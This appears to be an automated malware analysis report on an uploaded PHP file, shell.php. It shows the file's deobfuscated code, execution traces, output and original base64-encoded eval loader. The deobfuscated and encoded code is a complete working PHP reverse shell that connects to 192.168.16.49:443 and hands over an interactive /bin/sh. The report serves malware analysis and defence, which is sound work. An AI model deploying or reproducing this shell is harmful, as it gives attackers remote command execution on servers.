PHP Malware Analysis
shell.php
md5: c49908f4ea7a6139434712a0f1675c58
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Environment
- set_time_limit (Deobfuscated, Traces)
Execution
- eval (Original, Traces)
- proc_open (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
eval /* PHPDeobfuscator eval output */ {
set_time_limit(0);
$VERSION = "1.0";
$ip = '192.168.16.49';
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0);
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("{$errstr} ({$errno})");
exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to {$ip}:{$port}");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) {
printit("SOCK READ");
}
$input = fread($sock, $chunk_size);
if ($debug) {
printit("SOCK: {$input}");
}
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) {
printit("STDOUT READ");
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
printit("STDOUT: {$input}");
}
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) {
printit("STDERR READ");
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
printit("STDERR: {$input}");
}
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit($string)
{
if (!$daemon) {
print "{$string}\n";
}
}
?>
<?php
};Execution traces
data/traces/c49908f4ea7a6139434712a0f1675c58_trace-1676257480.1188.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:05:06.016652]
1 0 1 0.000137 393512
1 3 0 0.000196 396496 {main} 1 /var/www/html/uploads/shell.php 0 0
2 4 0 0.000213 396496 base64_decode 0 /var/www/html/uploads/shell.php 1 1 'PD9waHAKc2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4xNi40OSc7IAokcG9ydCA9IDQ0MzsgICAgICAgCiRjaHVua19zaXplID0gMTQwMDsKJHdyaXRlX2EgPSBudWxsOwokZXJyb3JfYSA9IG51bGw7CiRzaGVsbCA9ICd1bmFtZSAtYTsgdzsgaWQ7IC9iaW4vc2ggLWknOwokZGFlbW9uID0gMDsKJGRlYnVnID0gMDsKCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIAoJfQoJaWYgKHBvc2l4X3NldHNpZCgp'
2 4 1 0.000257 399600
2 4 R '<?php\nset_time_limit (0);\n$VERSION = "1.0";\n$ip = \'192.168.16.49\'; \n$port = 443; \n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = \'uname -a; w; id; /bin/sh -i\';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists(\'pcntl_fork\')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit("ERROR: Can\'t fork");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); \n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit("Error: Can\'t setsid()");\n\t\texit(1);\n\t}\n\n\t$daemon = '
2 5 0 0.000418 424536 eval 1 '?><?php\nset_time_limit (0);\n$VERSION = "1.0";\n$ip = \'192.168.16.49\'; \n$port = 443; \n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = \'uname -a; w; id; /bin/sh -i\';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists(\'pcntl_fork\')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit("ERROR: Can\'t fork");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); \n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit("Error: Can\'t setsid()");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit("WARNING: Failed to daemonise. This is quite common and not fatal.");\n}\n\nchdir("/");\n\numask(0);\n\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit("$errstr ($errno)");\n\texit(1);\n}\n\n$descriptorspec = array(\n 0 => array("pipe", "r"),\n 1 => array("pipe", "w"),\n 2 => array("pipe", "w") \n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit("ERROR: Can\'t spawn shell");\n\texit(1);\n}\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit("Successfully opened reverse shell to $ip:$port");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit("ERROR: Shell connection terminated");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit("ERROR: Shell process terminated");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit("SOCK READ");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit("SOCK: $input");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit("STDOUT READ");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit("STDOUT: $input");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit("STDERR READ");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit("STDERR: $input");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint "$string\\n";\n\t}\n}\n\n?> \n' /var/www/html/uploads/shell.php 1 0
3 6 0 0.000487 424536 set_time_limit 0 /var/www/html/uploads/shell.php(1) : eval()'d code 2 1 0
3 6 1 0.000504 424600
3 6 R FALSE
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 3 $VERSION = '1.0'
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 4 $ip = '192.168.16.49'
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 5 $port = 443
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 6 $chunk_size = 1400
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 7 $write_a = NULL
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 8 $error_a = NULL
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 9 $shell = 'uname -a; w; id; /bin/sh -i'
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 10 $daemon = 0
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 11 $debug = 0
3 7 0 0.000617 424568 function_exists 0 /var/www/html/uploads/shell.php(1) : eval()'d code 13 1 'pcntl_fork'
3 7 1 0.000631 424608
3 7 R FALSE
3 8 0 0.000645 424568 printit 1 /var/www/html/uploads/shell.php(1) : eval()'d code 31 1 'WARNING: Failed to daemonise. This is quite common and not fatal.'
3 8 1 0.000678 424568
3 9 0 0.000686 424568 chdir 0 /var/www/html/uploads/shell.php(1) : eval()'d code 34 1 '/'
3 9 1 0.000703 424640
3 9 R TRUE
3 10 0 0.000717 424600 umask 0 /var/www/html/uploads/shell.php(1) : eval()'d code 36 1 0
3 10 1 0.000731 424632
3 10 R 18
3 11 0 0.000744 424648 fsockopen 0 /var/www/html/uploads/shell.php(1) : eval()'d code 38 5 '192.168.16.49' 443 NULL NULL 30
3 11 1 30.030531 424864
3 11 R FALSE
2 A /var/www/html/uploads/shell.php(1) : eval()'d code 38 $sock = FALSE
3 12 0 30.030580 424752 printit 1 /var/www/html/uploads/shell.php(1) : eval()'d code 40 1 'Connection timed out (110)'
3 12 1 30.030604 424752
30.030643 345408
TRACE END [2023-02-13 01:05:36.047185]
Generated HTML code
<html><head></head><body>WARNING: Failed to daemonise. This is quite common and not fatal.
Connection timed out (110)
</body></html>Original PHP code
<?php eval("?>".base64_decode("PD9waHAKc2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4xNi40OSc7IAokcG9ydCA9IDQ0MzsgICAgICAgCiRjaHVua19zaXplID0gMTQwMDsKJHdyaXRlX2EgPSBudWxsOwokZXJyb3JfYSA9IG51bGw7CiRzaGVsbCA9ICd1bmFtZSAtYTsgdzsgaWQ7IC9iaW4vc2ggLWknOwokZGFlbW9uID0gMDsKJGRlYnVnID0gMDsKCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIAoJfQoJaWYgKHBvc2l4X3NldHNpZCgpID09IC0xKSB7CgkJcHJpbnRpdCgiRXJyb3I6IENhbid0IHNldHNpZCgpIik7CgkJZXhpdCgxKTsKCX0KCgkkZGFlbW9uID0gMTsKfSBlbHNlIHsKCXByaW50aXQoIldBUk5JTkc6IEZhaWxlZCB0byBkYWVtb25pc2UuICBUaGlzIGlzIHF1aXRlIGNvbW1vbiBhbmQgbm90IGZhdGFsLiIpOwp9CgpjaGRpcigiLyIpOwoKdW1hc2soMCk7Cgokc29jayA9IGZzb2Nrb3BlbigkaXAsICRwb3J0LCAkZXJybm8sICRlcnJzdHIsIDMwKTsKaWYgKCEkc29jaykgewoJcHJpbnRpdCgiJGVycnN0ciAoJGVycm5vKSIpOwoJZXhpdCgxKTsKfQoKJGRlc2NyaXB0b3JzcGVjID0gYXJyYXkoCiAgIDAgPT4gYXJyYXkoInBpcGUiLCAiciIpLAogICAxID0+IGFycmF5KCJwaXBlIiwgInciKSwKICAgMiA9PiBhcnJheSgicGlwZSIsICJ3IikgCik7CgokcHJvY2VzcyA9IHByb2Nfb3Blbigkc2hlbGwsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKTsKCmlmICghaXNfcmVzb3VyY2UoJHByb2Nlc3MpKSB7CglwcmludGl0KCJFUlJPUjogQ2FuJ3Qgc3Bhd24gc2hlbGwiKTsKCWV4aXQoMSk7Cn0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMF0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sxXSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzJdLCAwKTsKc3RyZWFtX3NldF9ibG9ja2luZygkc29jaywgMCk7CgpwcmludGl0KCJTdWNjZXNzZnVsbHkgb3BlbmVkIHJldmVyc2Ugc2hlbGwgdG8gJGlwOiRwb3J0Iik7Cgp3aGlsZSAoMSkgewoJaWYgKGZlb2YoJHNvY2spKSB7CgkJcHJpbnRpdCgiRVJST1I6IFNoZWxsIGNvbm5lY3Rpb24gdGVybWluYXRlZCIpOwoJCWJyZWFrOwoJfQoKCWlmIChmZW9mKCRwaXBlc1sxXSkpIHsKCQlwcmludGl0KCJFUlJPUjogU2hlbGwgcHJvY2VzcyB0ZXJtaW5hdGVkIik7CgkJYnJlYWs7Cgl9CgoJJHJlYWRfYSA9IGFycmF5KCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CgkkbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9zZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsKCglpZiAoaW5fYXJyYXkoJHNvY2ssICRyZWFkX2EpKSB7CgkJaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSyBSRUFEIik7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQlpZiAoJGRlYnVnKSBwcmludGl0KCJTT0NLOiAkaW5wdXQiKTsKCQlmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoKCWlmIChpbl9hcnJheSgkcGlwZXNbMV0sICRyZWFkX2EpKSB7CgkJaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RET1VUIFJFQUQiKTsKCQkkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsKCQlpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQ6ICRpbnB1dCIpOwoJCWZ3cml0ZSgkc29jaywgJGlucHV0KTsKCX0KCglpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkgewoJCWlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUiBSRUFEIik7CgkJJGlucHV0ID0gZnJlYWQoJHBpcGVzWzJdLCAkY2h1bmtfc2l6ZSk7CgkJaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RERVJSOiAkaW5wdXQiKTsKCQlmd3JpdGUoJHNvY2ssICRpbnB1dCk7Cgl9Cn0KCmZjbG9zZSgkc29jayk7CmZjbG9zZSgkcGlwZXNbMF0pOwpmY2xvc2UoJHBpcGVzWzFdKTsKZmNsb3NlKCRwaXBlc1syXSk7CnByb2NfY2xvc2UoJHByb2Nlc3MpOwoKZnVuY3Rpb24gcHJpbnRpdCAoJHN0cmluZykgewoJaWYgKCEkZGFlbW9uKSB7CgkJcHJpbnQgIiRzdHJpbmdcbiI7Cgl9Cn0KCj8+IAo=")); ?>